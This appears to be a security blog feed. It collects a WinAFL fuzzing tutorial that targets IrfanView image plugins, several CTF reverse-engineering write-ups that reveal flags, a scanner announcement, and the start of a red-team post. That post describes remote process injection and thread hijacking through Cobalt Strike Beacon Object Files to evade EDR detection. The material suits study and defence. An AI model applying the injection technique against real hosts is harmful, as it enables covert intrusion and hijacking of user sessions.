
Start fuzzing, Fuzz various image viewers

24 May 2020 at 08:16
By: linhlhq

I am returning to writing about what I have done in the past year; it has been two years since I last posted on this blog. In this article I will share the fuzzing experience I have gathered while using popular fuzzers to find bugs in closed-source products. The environment I work in is Windows, and the fuzzers I use target products on this platform. Here I will use a popular fuzzer called Winafl to find bugs in popular image viewers such as Irfanview [1], FastStone [2], Xnview [3], etc.


Introduction


I will not elaborate on Winafl's architecture or how to use it. I will leave some links [4] [5] covering these topics at the end of the article for anyone interested.


Why did I choose image viewers as fuzzing targets? File format fuzzing is arguably the most popular fuzzing approach today: it takes little time to prepare, it is accessible, corpora are easy to find (depending on the case), and the logic that parses these file formats is still very likely to contain bugs.


Here I will take Irfanview as an example: how I approach it and use a fuzzer to find bugs in Irfanview's image format parsers.


Reverse and understand


Irfanview handles many image file formats. Some formats are handled inside the i_view32.exe program itself, while others are handled by plugins shipped as DLLs.


We need to understand how image files flow through the program. How quick or slow, hard or easy the reverse engineering needed to understand that logic is depends on the complexity of each program; with complex programs it can take a lot of time.


However, in this case I will use DynamoRIO [6] (a tool that can compute the coverage of a program as it executes) to speed up my reversing.


Using DynamoRIO together with IDA's Lighthouse plugin [7], we can tell, for a given input, which paths the program takes and which code it executes, saving a lot of reversing time.


For example, when Irfanview processes a jpeg2000 image, the drrun.exe command to generate the coverage file is:

drrun.exe -t drcov -- i_view32.exe _00042.j2k

With this command, DynamoRIO generates a file listing the loaded DLLs along with the coverage of the main program and of each DLL.


Here is an example coverage output file:



We can see that JPEG2000.dll is loaded during the processing of the _00042.j2k file.


Now use the Lighthouse plugin in IDA to view the results. The instructions highlighted in green are the ones executed when i_view32.exe processed the _00042.j2k file.



From there we trace back to the jpeg2000 processing functions; searching for related strings is the fastest and most effective way I know. We can see that i_view32.exe loads the library JPEG2000.dll and then calls the ReadJPG2000_W() function to process the jpeg2000 file.


Let's debug to see the parameters passed to the ReadJPG2000_W() function; we set a breakpoint at the address where ReadJPG2000_W() is called:

From the state of the stack at the moment ReadJPG2000_W() is called, the parameters passed to the function are as follows:

- wchar_t *argv1: the name of the jpeg2000 file to be processed.

- int argv2: a variable holding the value 0.

- wchar_t *argv3: a buffer of size 2048.

- wchar_t *argv4: a buffer of size 2048, initialized with the string "None".

- int argv5, argv6: used to store parameters while parsing the jpeg2000 file.


It is then quite simple to build a harness that calls this function with the parameters above to parse a jpeg2000 image file, because these parameters are completely independent of the i_view32.exe program.


Here is the harness that I wrote:
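A minimal sketch of such a harness, based only on the parameters inferred from the debugging session above; the ReadJPG2000_W signature, its calling convention, and the exact types are my assumptions, not a documented API:

```c
#include <windows.h>
#include <stdio.h>

/* Assumed signature, reconstructed from the stack layout observed
   when i_view32.exe calls into JPEG2000.dll. */
typedef int(__cdecl *ReadJPG2000_W_t)(wchar_t *path, int flag,
                                      wchar_t *buf1, wchar_t *buf2,
                                      int *out1, int *out2);

int wmain(int argc, wchar_t **argv)
{
    if (argc < 2) {
        wprintf(L"usage: %s <file.j2k>\n", argv[0]);
        return 1;
    }

    HMODULE lib = LoadLibraryA("JPEG2000.dll");
    if (!lib)
        return 1;

    ReadJPG2000_W_t ReadJPG2000_W =
        (ReadJPG2000_W_t)GetProcAddress(lib, "ReadJPG2000_W");
    if (!ReadJPG2000_W)
        return 1;

    wchar_t buf1[2048] = {0};
    wchar_t buf2[2048] = L"None";   /* argv4 is initialized to "None" */
    int out1 = 0, out2 = 0;

    /* argv2 holds 0; argv5/argv6 receive parsing parameters. */
    return ReadJPG2000_W(argv[1], 0, buf1, buf2, &out1, &out2);
}
```

The harness must be built as a 32-bit binary so it can load the 32-bit plugin DLLs that ship with i_view32.exe.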



Run the harness with a jpeg2000 input file and check its coverage on JPEG2000.dll.

Great, it matches i_view32.exe's jpeg2000 processing flow correctly.

With this harness we can start fuzzing. I use corpora from the following GitHub repos:

 - openjpeg

 - go-fuzz-corpus

 - and some corpora from my previous fuzzing projects.

With Lighthouse, we can also see the coverage of each function in the DLL.


With the file I used, coverage of the ReadJPG2000_W function is only about 34%. Of course this figure is not ideal for fuzzing; you need to find a corpus that pushes this number as high as possible.


Use Winafl to fuzz jpeg2000 with the harness built above:
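A Winafl invocation for a harness like this typically looks as follows; the paths, the offset, and the module names here are placeholders, not the exact values from my setup:

```shell
afl-fuzz.exe -i corpus -o findings -D C:\DynamoRIO\bin32 -t 20000 -- ^
  -coverage_module JPEG2000.dll -target_module harness.exe ^
  -target_offset 0x1260 -fuzz_iterations 5000 -nargs 1 -- ^
  harness.exe @@
```

Here -coverage_module names the DLL whose coverage guides the fuzzer, while -target_module/-target_offset identify the function Winafl repeatedly executes in its persistent loop.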


Looking at the Winafl interface, we should pay attention to the following parameters:

- exec speed: the number of test cases executed per second.

- stability: this indicator shows stability during fuzzing. Winafl runs a certain number of iterations on each test case; in theory, iterations on the same test case must produce the same coverage. If the coverage changes between iterations, stability will be low.

- map density: this parameter shows the coverage of the target when running the current test case.


All three of these parameters must be high for fuzzing to be effective [4].
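As a rough illustration (this is not Winafl's actual implementation), stability can be modeled as the fraction of coverage-map entries that stay identical across repeated runs of the same test case:

```python
def stability(maps):
    """Fraction of coverage-map entries identical across all runs
    of the same test case (1.0 = fully deterministic target)."""
    first = maps[0]
    stable = sum(
        all(m[i] == first[i] for m in maps) for i in range(len(first))
    )
    return stable / len(first)

# Two runs of the same input: 3 of the 4 map entries agree.
runs = [[1, 0, 2, 5], [1, 0, 2, 7]]
print(stability(runs))  # 0.75
```

A target with threads, timers, or uninitialized state will produce differing maps between runs, which is exactly what drags the stability figure down.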


Irfanview treats other image file formats the same way as jpeg2000: the plugin responsible for parsing each image format exposes similar processing functions. Besides the jpeg2000 format, I also tried other formats such as gif, dicom, djvu, ani, dpx, wbmp, webp, ...


Results: CVE-2019-17241, CVE-2019-17242, CVE-2019-17243, CVE-2019-17244, CVE-2019-17245, CVE-2019-17246, CVE-2019-17247, CVE-2019-17248, CVE-2019-17249, CVE-2019-17250, CVE-2019-17251, CVE-2019-17252, CVE-2019-17253, CVE-2019-17254, CVE-2019-17255, CVE-2019-17256, CVE-2019-17257, CVE-2019-17258, CVE-2019-17259, CVE-2019-17261, CVE-2019-17262


Tips and Tricks


While using Winafl, I found it to be most stable on Windows 7. On Windows 10 it behaves very badly: DynamoRIO has some memory problems on Windows 10 that cause the fuzzer to crash frequently.


When fuzzing, I recommend turning on Page Heap for the harness, to better detect out-of-bounds and uninitialized-memory errors.
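Page Heap can be enabled per binary with the gflags.exe utility from the Debugging Tools for Windows; the harness name here is a placeholder:

```shell
gflags.exe /p /enable harness.exe /full
```

The /full option places each heap allocation at the end of a page so out-of-bounds accesses fault immediately; omitting it gives the lighter-weight variant that only checks on free.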


Afl-tmin is a useful tool for minimizing test cases, which helps the fuzzer a lot when mutating the corpus. However, I usually do not use it because it is too slow. I think I will try the halfempty tool [8] as a replacement for afl-tmin in the future.


Speeding up: the fewer Windows API calls the harness makes, the faster DynamoRIO's instrumentation runs. In the harness I wrote above, I call LoadLibraryA inside the main function to load the DLL I need to fuzz, and my target_offset points at the main function; this greatly reduces the running speed of the fuzzer.


There are many workarounds. Among the approaches I have read about [9], changing the offset at which instrumentation starts is quite good, but when I tested that method in debug mode with the iterator, my fuzzer was unstable, and I do not know why. Instead, I use LIEF [10] to solve this problem: I load the library I need to fuzz before the main function executes:
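A sketch of that LIEF approach, with placeholder file names: the target DLL is added to the harness's import table, so the Windows loader maps it before the entry point runs and the LoadLibraryA call in main becomes unnecessary:

```python
import lief

pe = lief.parse("harness.exe")

# Add JPEG2000.dll to the import table so the loader maps it before
# the entry point runs, instead of calling LoadLibraryA in main.
jpeg2000 = pe.add_library("JPEG2000.dll")
jpeg2000.add_entry("ReadJPG2000_W")

builder = lief.PE.Builder(pe)
builder.build_imports(True)
builder.build()
builder.write("harness_patched.exe")
```

The harness then resolves ReadJPG2000_W through its own import table rather than via GetProcAddress at runtime.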


                
And this is the result after the fuzz target has been patched my way:

                

Speed has improved, but this is not the best approach, because speed also depends on the target you fuzz, not only on the harness you build. I use it because there is another fuzzer on Windows that I later came to prefer over Winafl, and loading the library before the main function fits that fuzzer's architecture. I will say more about that fuzzer in a following article.


Corpus: many people new to fuzzing think that building a harness is the most important and hardest part. For me, finding a corpus is the hardest problem. Corpora with high coverage are very rare, and people usually do not share them because they are so valuable for fuzzing.


When you have gathered a large corpus, you should use winafl-cmin to reduce the number of test cases: there will be test cases whose coverage duplicates, or is subsumed by, that of other test cases.
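winafl-cmin takes the same instrumentation options as the fuzzer itself; a typical invocation, with placeholder paths and offsets, might look like:

```shell
python winafl-cmin.py -D C:\DynamoRIO\bin32 -t 100000 ^
  -i corpus_full -o corpus_min ^
  -coverage_module JPEG2000.dll -target_module harness.exe ^
  -target_offset 0x1260 -nargs 1 -- harness.exe @@
```

It runs every input once, records each one's coverage, and keeps only a minimal subset that preserves the union of all observed coverage.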


Conclusion


This is the first target I used to learn fuzzing. When my bugs were submitted and assigned CVEs, some people said I was farming cheap CVEs. I do not argue with those people; I only care about what I do and what I learn from it. Continuing this series on fuzzing, I will share how I approached and fuzzed out bugs in VMware, Microsoft, ... based on what I covered in this article.


[3] https://www.xnview.com/en/

[4] https://www.apriorit.com/dev-blog/644-reverse-vulnerabilities-software-no-code-dynamic-fuzzing

[5] https://symeonp.github.io/2017/09/17/fuzzing-winafl.html

[6] https://github.com/DynamoRIO/dynamorio

[7] https://github.com/gaasedelen/lighthouse

[8] https://github.com/googleprojectzero/halfempty

[9] https://github.com/googleprojectzero/winafl/issues/4

[10] https://github.com/lief-project/LIEF





RedVelvet - 75 pts

6 February 2018 at 09:06
By: linhlhq
Nothing special in this challenge: enter the flag and it checks each character:


The functions fun1 -> fun15 check the characters of the flag. The anti-debug part is so obvious that bypassing it is ezzz.
Once all those functions are checked there are multiple flags; well, "multiple", but really just a few, so you can happily brute-force and submit them all without a problem. Otherwise, going a bit further there is a SHA256 hash check. Me, I just submitted them directly =)).

My solution code is brute force :( since there was a hash, I worried there were multiple answers, and with z3 I feared I would have to hunt for more results later.

easy_serial - 350pts

6 February 2018 at 09:04
By: linhlhq
This is a challenge that I personally consider uncivilized. Or the author's intent was to force us to use a decompiler tool.
At first I happily loaded it into IDA. I immediately hit the virtual alarm trick; bypassing that trick just to read the code is quite a hassle (not counting similar tricks that only call the alarm function, which would be too easy). Reading the code to find its main function, I saw a rather odd name, "Main_main_infor", ... Googling revealed it was written in Haskell. Checking again, I spotted GHC right away.


Continuing to google for a decompiler tool for it, I found one; the link is here. Quite easy to use. I also found a link where someone decompiles it manually, worth reading for their approach. After decompiling, it produced a pile like this, probably symbolic opcodes, because when I searched for Haskell's structures they looked different from this pile.

Copying it into Notepad and reading through, I spotted some familiar text strings; looking feasible =)).

At this point the challenge stopped being interesting, because it plainly compares those characters. And here is my script for this challenge.

Boom - 223pts

6 February 2018 at 08:59
By: linhlhq
This challenge was also specially built, multi-platform. If you are not used to debugging and step into every function, it wastes a lot of time.
The organizers made this challenge far too long. A VM challenge I once did was only about this long.
The program has many branches, and so does the input. I only got halfway before stopping, because I checked the server and found it already closed. A pity; I do not know whether it will reopen.

Because it is so long I considered not writing this post; I really dislike going into detail. Here I will only outline the parts I solved.
A quick word about the program's purpose: it makes you enter a string, and if correct it reads a file from /tmp/files/?, and so on, deeper and deeper; the more correct inputs, the more files you read. The files are numbered 1 -> 13. Since I have not finished all the branches and the server is down, I am not sure what those files contain. Possibly the characters of the FLAG.

1. First, when the program starts, it asks you to enter a string.

The string you enter has 3 cases:
If you enter the string "Know what? It's a new day~" you go to branch 1 (I just name them for ease of writing)
If you enter: " It's cold outside.." you go to branch 2 -> open file /tmp/files/2
If you enter: "We need little break!" you go to branch 3 -> open file /tmp/files/3
 I took branch 1 => open and read file /tmp/files/1

2. Next the program reads in 7 numbers. These 7 numbers are converted into a character string and compared; if correct, it goes on to read one more file. The special thing is that there are up to 3 strings it compares against =)).

key1 = "carame1" => [3 14 7 14 60 1 26] => /tmp/files/4
key2 = 'w33kend' => [49 15 15 31 1 23 13] => /tmp/files/5
key3 = 'pand0ra' => [57 14 23 13 50 7 14] => /tmp/files/6
All 3 of the sequences above are accepted, but each one opens a different file. Confusing as hell.

3. Next the program asks you to enter one number and checks it through the function main::fun12

If (main::fun12(0, number) == 0x6b) => true
Plenty of numbers satisfy that condition. After a correct input it goes on to open the file /tmp/files/13

4. Then it asks for 4 more numbers. At this point I read the code, could not figure out what those numbers were for, and got pretty discouraged. But who knew: whatever goes wrong, this program prints it all out for you.

I tried a few more inputs and realized the numbers only range from 1 -> 9. So why not brute force =)).
I brute-forced out some solutions that satisfy it. Ex: 1 3 5 8
And on a correct input it goes on to open the file /tmp/files/8

5. Next is a string that gets transformed and compared with "H_vocGfsg4p_xicwcrwexg4r". The transformation algorithms are in my solution code.
On a correct input it goes on to open the file /tmp/files/11
After finishing this string, I realized it loops back to the 7-number input, so I went on and entered the remaining cases from above.
- For the case key1 = "carame1" => [3 14 7 14 60 1 26] => /tmp/files/4, it just keeps circling back through the steps above
- Only with the case key3 = 'pand0ra' => [57 14 23 13 50 7 14] => /tmp/files/6 does it then ask me to enter 27 numbers and check them. And it opens one more file, /tmp/files/10
At this point I checked very carefully but found no exit condition; it just keeps looping between entering numbers and entering strings.
If those files contain the characters of the flag, I would probably run it 3 times to pull the characters out =)).
That's probably it for now. If the server comes back up I will finish the rest =)). My code solving these problems is here.

Review nhẹ các bài Reverse ở Codegate

6 February 2018 at 08:51
By: linhlhq
1. RedVelvet – 75 pts
    A simple challenge, purely checking the characters of the flag.
2. Welcome to droid - 125pts
    I solved this one rather clumsily: their write-up patches the entry point, while I went and read dalvik opcodes and patched the random function =)). Pretty dumb, so I am not writing it up.
3. Boom - 223pts
    I was almost done with this one when I found the server shut down, so I stopped. Basically it is quite long and awkwardly built too.
4. easy_serial - 350pts
    Also an awkward one like Boom. But even more awkward in that a decompiler tool exists for it.
5. 6051 - 880pts
    The best challenge I managed to solve in this batch; heavily algorithmic.
6. CPU - 971pts
    Probably a VM type; a quick look at the code resembles a challenge from mates-round1, which also asked you to enter opcodes to execute. It also connects to a server, which is down, so I have not touched it =)). Excuses =)); even if it were up I could hardly beat it.

Serialme

26 December 2017 at 15:32
By: linhlhq
This is a vm engine type challenge. I read many write-ups by many pros and understood nothing of their solutions :v. All too civilized for me.
I hope that later I will understand this better. For now, I solved this challenge thanks to this.
I read up a bit on the mechanism of the vm_engine. Its mechanism is concentrated in the "vm_loop" loop.
A quick word about this challenge: it asks you to enter 10 numbers in turn, and once all 10 are correct the flag pops out. That sounds simple, but that vm_engine made the checking of those numbers really confusing for me.
Concretely, in this challenge the vm loop looks roughly like this:

This loop has up to 20 cases, and each case basically performs a single operation such as add, xor, mov, ... So I just traced through it the brute-force way :v.

case 12: is the case where the number is read in and processed. After that pile of code processes the input number, the value is stored in eax. Going deep into it is actually pretty messy, because the author turned the input into file input, so the entered number arrives as a string and gets converted back and forth before producing the value stored in eax.
From there, each number passes through the cases to perform the calculations, and at the end of each pass it stops at case 8 for a comparison. We need to satisfy the condition there to be allowed to enter the next number.

From here it's ezz: brute force out the flag :v.

Debugme

26 December 2017 at 14:57
By: linhlhq
I will explain this one briefly. When you enter the flag, it gets encrypted (AES 256), then XORed with a string :v. That's all of it =)).
As for the individual conditions: flag length = 9.

After that, the program creates a thread. This thread runs 16 encryption loops, but that is just trolling you :v: it runs 16 identical rounds, not chained ones. All that thread really does is AES-encrypt the flag.

- Here is the AES encryption source code. This thread fooled me and cost me quite a lot of time. As I said above, it really only encrypts the flag once, not 16 times. But when I checked the result after my input string ran through this thread, it returned a value different from a single encryption, which left me going back and forth ^^.
- After a while I noticed the WaitForMultipleObjectsEx function right below the thread. I set a breakpoint before that Sleep call, because I found the value was changed after running through Sleep.
- To catch that moment, I set a hardware breakpoint on the address storing the string's result (byte_1D4CA0) and ran normally, so that when the function that modifies the encrypted value executed, my program would stop there.
- And here is the function that changes the ciphertext: it simply XORs it with the value at xmmword_1A9EF0.

- That's it: the ciphertext after the XOR is compared with the value here.

- I did all the ciphertext and plaintext checks on this website: http://aes.online-domain-tools.com/

Unlockme

26 December 2017 at 14:51
By: linhlhq
This is a serial-type challenge: you enter a name and a key. Transform the name and key so they match the challenge's algorithm and you get the flag :v.
The code is quite long and tangled. The algorithm in brief:
- For the name: after input, each character is transformed according to the following pseudocode:

After the transformation, the value of the base variable is used to check the key you entered.
- For the key, its format is xx-xx-xx-xx => len = 11. If you look closely there is a check on the key length:

Next, the xx values are converted directly into numbers. For example 12-13-3f-4a becomes the 4 numbers 12, 13, 3f, 4a.
These numbers are added to the characters of the base above, in reverse order, under the following constraint:
base[0] + 4th number == base[1] + 3rd number == base[2] + 2nd number == base[3] + 1st number
(that ordering is just how I describe it for ease of visualization; the author's source code may be more civilized than mine =)))
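With the base values known, a satisfying key can be computed directly instead of brute-forced. A sketch with a hypothetical base (the real values come from the name transformation above):

```python
# Hypothetical base derived from the name transformation.
base = [0x41, 0x43, 0x40, 0x45]

# Pick a common target sum, then solve each key byte so that
# base[0] + k4 == base[1] + k3 == base[2] + k2 == base[3] + k1 == target
target = max(base) + 1
k4, k3, k2, k1 = (target - b for b in base)

# Format as the expected xx-xx-xx-xx serial (length 11).
key = "-".join(format(k, "02x") for k in (k1, k2, k3, k4))
print(key)  # 01-06-03-05
```

Any target at least as large as max(base) works, so there are many valid keys, which fits the reversed-order constraint above.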
When I got this far I thought it was done; who knew the organizers would troll us with a fake flag :v. I submitted wrong answers repeatedly.

The author also anti-debugs the part that prints the flag, and apparently requires the name to be longer than 1 character; I just patched a register to bypass that :v
WhiteHat{2f2a1ebcc9f4b69502343e04bc2ae7e185e4c01a}

Writeup Pyc

26 December 2017 at 14:47
By: linhlhq
After extracting the file I received, I got connect.pyc. Just use a decompiler tool to get the source. And here is its source.

This is a way of executing code that Python supports: that pile of data is a binary form built from source, which can be executed via marshal.loads as above.
I googled to learn about this, and everywhere I looked only showed how to use Python's disassembler to render that source into an asm-like language I could understand.
Seeing that, I thought it would be ezz, just dis it and read, but it was not simple at all :v

It took me a while to understand the structure of the pile in the picture =)). After that, I rewrote the content I had just disassembled to make it easier to follow. Link to the file where I reconstructed the code.

Its flag-checking behavior, once I had rewritten it in Python, is nothing special. The flag is split into 6 groups of 4 characters, each on its own line, and stored in a file named flag.txt. The program reads the flag from the file and checks it.
There are 3 main check functions, "xor", "check_flag" and "check_str"; the contents of flag.txt are run through these functions.
The hard part of this challenge is not getting the flag; the organizers' point was probably the pile of Python bytecode above that you need to disassemble and understand.
I wrote a script to work backwards and recover the flag groups, also basically brute force :v.
My script yields more than one flag, because I only used 2 of the conditions to check, but when it runs you can spot the correct flag immediately :v
{Ch4ll3ngE_V3ry_FUN_R1gHt}

FeelMyPain

26 December 2017 at 14:38
By: linhlhq
I have no idea what the organizers intended with this one; basically I tried my guess and it just worked, so I did not look closely at the technique involved. It seems to raise an SEH exception.
The call esi instruction took me straight to the flag :v

Flag: love_is_the_reason_why_there_is_pain

Writeup re250 (Picaso)

14 December 2017 at 14:00
By: linhlhq
I fiddled with the da-vinci challenge (re150) for a while and could not figure out what the author intended, even though that challenge's algorithm was very clear.
So I switched to picaso (re250) :v, not chosen for the name, just by looking at the number of solvers.
At first the file size looked suspicious (~10 MB). Loading it into IDA, I was startled to see nothing but mov instructions :v. And this was a type I had done before (the UET team selection exam).
This is code obfuscated with mov instructions; debugging it as-is is hopeless.
  • If you stubbornly trace it, you will probably see that yellow text in the picture quite a few times :v.
  • For this type, the first step is to deobfuscate the code. I did not know how, but someone else did; they even wrote code for it, and I just took their tool and used it.
  • After de-mov-obfuscating, the code does not look very different, still plenty of mov instructions, but the important part is that the JMP instructions that were previously obfuscated away now appear.
  • From here the challenge is much easier to solve; because it relies on obfuscated code, the actual flag check is very simple.
  • Here is how I traced the flag-checking code backwards:
    • I found the text that prints the flag -> gave this code block a new label
    • Then found that "No! Try another key!" part -> labeled that too
    • And started tracing the code backwards from where the flag is printed. There are up to 9 JMP instructions to the No_flag label => a rough first guess: 1 length check, 8 flag checks.
    • Tracing up from the flag-printing code, it is easy to see that it checks the flag, then if satisfied jumps to the next flag-check block, and otherwise does Jmp No_flag
    • Keep going like this to the top of the code (this is very fast compared to blindly brute-force debugging), where you find the flag length check:
  • Once that is done you can just debug :v to find the flag, but the code is still messy with lots of movs, and tracing out the flag would take a while. While tracing backwards, though, I noticed that inside the flag-check functions the code is mostly identical: the opening block (jumped to) and the closing block (jumping away) have the same structure, so in between :v...
mov R3, edx
mov R2, value
mov eax, R3
mov edx, R2
    • This little snippet is the key to the challenge: that value changes with each JMP, and I collected all of the values here:
    • [8,0x71,0x69,0x65,0x65,0x76,0x74,0x69,0x74] => [qieevtit]
  • The 8 is probably the length of the flag
  • Entering it shows it is not the flag; the character positions have been permuted. Brute force came to mind immediately, since I really did not want to debug that pile of code. Around this time I was learning tools like z3 and angr (I am hopeless with those tools; challenges solvable with them I usually just scratch out in Notepad++).
  • To figure out the rest of the flag I used Pin, which I read about on my mentor's blog a long time ago and find very neat. The tool simply counts the number of instructions executed during a run. So I try permuting the positions of those characters: if the instruction count increases across attempts, the position is correct, otherwise it is wrong :v. And here is my solver written in Python; it runs fine but slowly, and I do not know how to make it faster.
  • My only remaining puzzlement is this challenge's length check. When I used the tool to re-check the flag length, oddly, for flags of 7 characters or fewer the instruction count rises gradually, but from 8 characters up the count drops slightly compared to len = 7 and never changes after that => I am still unclear about this length check. If that is the case, the author's length check may only test >= 8, or be something else I do not know.
Và đây là kết quả mình thử lấy flag với pin tool:

=)) tieqviet
And off we go to submit the flag:

Announcing ECG v2.0

11 January 2021 at 13:39
By: voidsec

We are proud to announce that ECG got its first major update. ECG is the first and only commercial solution (a static source code scanner) able to analyze & detect real and complex security vulnerabilities in TCL/ADP source code. ECG v2.0's New Features - On-Premises Deploy: Scan your code repository on your secure and highly-scalable offline appliance with a local […]

The post Announcing ECG v2.0 appeared first on VoidSec.

Malware Development: Leveraging Beacon Object Files for Remote Process Injection via Thread Hijacking

9 January 2021 at 00:00

Introduction

As people I have interacted with will attest, my favorite subject in the entire world is binary exploitation. I love everything about it, from the problem solving aspects to the OS internals, assembly, and C side of the house. I also enjoy pushing my limits in order to find new and creative solutions for exploitation. In addition to my affinity for exploitation, I also love to red team. After all, this is what I do on a day to day basis. While I love to work my way around enterprise networks, I find myself really enjoying the host-based avoidance aspects of red teaming. I find it incredibly fun and challenging to use some of my prerequisite knowledge on exploitation and Windows internals in order to bypass security products and stay undetected (well, try to anyways). With Cobalt Strike, a very popular remote access tool (RAT), being so widely adopted by red teams - I thought I would investigate deeper into a newer Cobalt Strike capability, Beacon Object Files, which allow operators to write post-exploitation capabilities in C (which makes me incredibly happy as a person). This blog will go over a technique known as thread hijacking and integrating it into a usable Beacon Object File.

However, before beginning, I would like to delineate that this post will be focused on the techniques of remote process injection, thread hijacking, and thread restoration - not so much on Beacon Object Files themselves. Beacon Object Files, for our purposes, are a means to an end, as this technique can be deployed in many other fashions. As mentioned, Cobalt Strike is widely adopted; I think it is a great tool and I am a big proponent of it. I still believe, however, that at the end of the day it is more important to understand the overarching concept surrounding a TTP (Tactic, Technique, and Procedure) than to learn how to just arbitrarily run a tool, which in turn creates a bottleneck in your red teaming methodology by relying on the tool itself. If Cobalt Strike went away tomorrow, that shouldn't render this TTP, or any other TTPs, useless. Somewhat contradictorily, however, the first portion of this post will briefly outline what Beacon Object Files are, give a quick recap on remote process injection, and touch on writing code that adheres to the needs of Beacon Object Files.

Lastly, the final project can be found here.

Beacon Object Files - You have two minutes, go.

Back in June, I saw a very interesting blog post from Cobalt Strike that outlined a new Beacon capability, known as Beacon Object Files. Beacon Object Files, stylized as BOFs, are essentially compiled C programs that are executed as position-independent code within Beacon. You bring the object file and Cobalt Strike supplies the linking. Raphael Mudge, the creator of Cobalt Strike, has a YouTube video that goes over the intrinsics, capabilities, and limitations of BOFs. I highly recommend you check out this video. In addition, I encourage you to check out TrustedSec’s BOF blog and project to supplement the available Cobalt Strike documentation for BOF development.

One thing to note before moving on is that BOFs are intended to be “lightweight” tools. Lightweight may be subjective, but as Raphael points out in his video and blog, the main benefits of BOFs are twofold:

  1. BOFs do not spawn a temporary “sacrificial” process to perform post-exploitation work - they’re directly executed as position-independent code within the current Beacon process, increasing overall OPSEC (operational security).
  2. BOFs are really meant to interact with the Windows API and the internal Beacon API, as Beacon exposes a set of functions operators can use when developing. This means BOFs are smaller in size and easily allow you to invoke Windows APIs and interact with the internal Beacon API.

Additionally, there are a few drawbacks to BOFs:

  1. Cobalt Strike is the linker for BOFs - meaning libc style functions like strlen will not resolve. To compensate for this, however, you can use BOF compliant decorators in your function prototypes with the MSVCRT (Microsoft C Run-time) library and grab such functions from there. Declaring and using such functions with BOFs will be outlined in the latter portions of this post. Additionally, from Raphael’s CVE-2020-0796 BOF, there are ways to define your own C-style functions.
  2. BOFs are executed within the current Beacon process - meaning that if your BOF encounters some kind of internal error and fails, your Beacon process will crash as well. This means BOFs should be carefully vetted and tested across multiple systems, networks, and environments, while also implementing host-based checks for version information, using properly documented data types and structures outlined in a function’s prototype, and cleaning up any opened handles, allocated memory, etc.

Now that that’s out of the way, let’s get into a bit of background on remote process injection and thread hijacking, as well as outline our BOF’s execution flow.

Remote Process Injection

Remote process injection, for the unfamiliar, is a technique in which an operator can inject code into another process on a machine, under certain circumstances. This is most commonly done with a chain of Windows API calls that allocate some memory in the other process, write user-defined memory (usually shellcode of some sort) to that allocation, and kick off execution by creating a thread within the remote process. The APIs VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread are popular choices for each step, respectively.

Why is remote process injection important? Take a look at the image below, which is a listing of processes performed inside of a Cobalt Strike Beacon implant.

As is seen above, Cobalt Strike not only discloses to the operator what processes are running, but also under what user context a certain process is running under. This could be very useful on a penetration test in an Active Directory environment where the goal is to obtain domain administrative access. Let’s say you as an operator obtain access to a server where there are many users logged in, including a user with domain administrative access. This means that there is a great likelihood there will be processes running in context of this high-value user. This concept can be seen below where a second process listing is performed where another user, ANOTHERUSER has a PowerShell.exe process running on the host.

Using Cobalt Strike’s built-in inject capability, a raw Beacon implant can be injected into the PowerShell.exe process utilizing the remote injection technique outlined in the Cobalt Strike Malleable C2 profile, resulting in a second callback, in context of the ANOTHERUSER user, using the PID of the PowerShell.exe instance, process architecture (64-bit), and the name of the Cobalt Strike listener as arguments.

After the injection, there is a successful callback, resulting in a valid session in context of the ANOTHERUSER user.

This is useful to a red team operator, as the credentials for ANOTHERUSER were not needed in order to obtain access in context of said user. However, there are a few drawbacks - including endpoint detection and response (EDR) products that detect such behavior. One of the indicators of compromise (IOC) in this instance would be a remote thread being created in a remote process. There are more IOCs for this TTP, but this blog will focus on circumventing the need to create a remote thread. Instead, let's examine thread hijacking, a technique in which an already existing thread within the target process is suspended and manipulated in order to execute shellcode.

Thread Hijacking and Thread Restoration

As mentioned earlier, the process for a typical remote injection is:

  1. Allocate a memory region within the target process using VirtualAllocEx. A handle to the target process with an access right of at least PROCESS_VM_OPERATION must already exist in order to leverage this API successfully. This handle can be obtained using the Windows API function OpenProcess.
  2. Write your code to the allocated region using WriteProcessMemory. This requires a handle with an access right of at least PROCESS_VM_WRITE, in addition to the previously mentioned PROCESS_VM_OPERATION - meaning a handle to the remote process must have both of these access rights at minimum to perform remote injection.
  3. Create a remote thread, within the remote process, to execute the shellcode, using CreateRemoteThread.

Our thread hijacking technique will utilize the first two members of the previous list, but instead of CreateRemoteThread, our workflow will consist of the following:

  1. Open a handle to the remote process using the aforementioned access rights required by VirtualAllocEx and WriteProcessMemory.
  2. Loop through the threads on the machine utilizing the Windows API CreateToolhelp32Snapshot. This loop will contain logic to break upon identifying the first thread within the target process.
  3. Upon breaking the loop, open a handle to the target thread using the Windows API function OpenThread.
  4. Call SuspendThread, passing the former thread handle mentioned as the argument. SuspendThread requires the handle has an access right of THREAD_SUSPEND_RESUME.
  5. Call GetThreadContext, using the thread handle. This function requires that handles have a THREAD_GET_CONTEXT access right. This function will dump the current state of the target thread’s CPU registers, processor flags, and other CPU information into a CONTEXT record. This is because each thread has its own stack, CPU registers, etc. This information will be later used to execute our shellcode and to restore the thread once execution has completed.
  6. Inject the shellcode into the desired process using VirtualAllocEx and WriteProcessMemory. The shellcode that will be used in this blog will be the default Cobalt Strike payload, which is a reflective DLL. This payload will be dynamically generated with a user-specified listener that exists already, using a Cobalt Strike Aggressor Script. Creation of the Aggressor Script will follow in the latter portions of this blog post. The Beacon implant won’t be executed quite yet, it will just be sitting within the target remote process, for the time being.
  7. Since Cobalt Strike's default stageless payload is a reflective DLL, it works a bit differently than traditional shellcode. Because it is a reflective DLL, when the DllMain function is called to kick off Beacon, the shellcode never performs a “return”, because Beacon calls either ExitThread or ExitProcess to leave DllMain, depending on what is specified in the payload by the operator. Because of this, it would not be possible to restore the hijacked thread, as the thread would run the DllMain function until the operator exits the Beacon, since the stageless raw Beacon artifact does not perform a “return”. Due to this, we must create a shellcode that our Beacon implant will be wrapped in, with a custom CreateThread routine that creates a local thread within the remote process for the Beacon implant to run in. Essentially, this is one of three components our “new” full payload will “carry”, so when execution reaches the remote process, the call to CreateThread, which creates a local thread, will allocate the thread in the remote process for Beacon to run in. This means that the hijacked thread will never actually execute the Beacon implant; it will actually execute a small shellcode, made up of three components, that places the Beacon implant into its own local thread, along with two other routines that will be described here shortly. Up until this point, no code has been executed and everything mentioned is just a synopsis of each component's purpose.
